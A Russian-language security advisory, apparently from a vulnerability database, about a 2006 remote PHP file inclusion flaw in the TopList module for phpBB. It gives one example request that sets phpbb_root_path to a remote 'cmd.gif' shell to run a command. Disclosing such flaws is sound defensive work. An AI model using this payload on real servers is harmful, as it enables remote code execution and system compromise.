PHP-инклюдинг в phpBB TopList

Дата публикации:
03.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
2348
Опасность:
Высокая
Наличие исправления:
Инстуркции по устранению
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
TopList 1.x (модуль к phpBB)
Уязвимые версии: TopList (модуль для phpBB) 1.3.8, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии toplist.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

/toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls

URL производителя: www.phpbb2hacks.de/dload.php?action=file&file_id=148

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA